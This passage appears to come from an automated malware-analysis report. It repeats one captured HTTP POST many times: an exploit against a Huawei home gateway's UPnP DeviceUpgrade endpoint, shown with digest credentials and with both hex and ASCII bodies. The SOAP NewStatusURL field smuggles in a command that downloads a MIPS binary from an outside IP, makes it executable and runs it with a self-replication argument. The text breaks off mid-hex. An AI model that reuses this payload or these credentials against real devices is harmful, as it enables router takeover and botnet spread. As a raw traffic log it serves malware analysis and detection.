3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 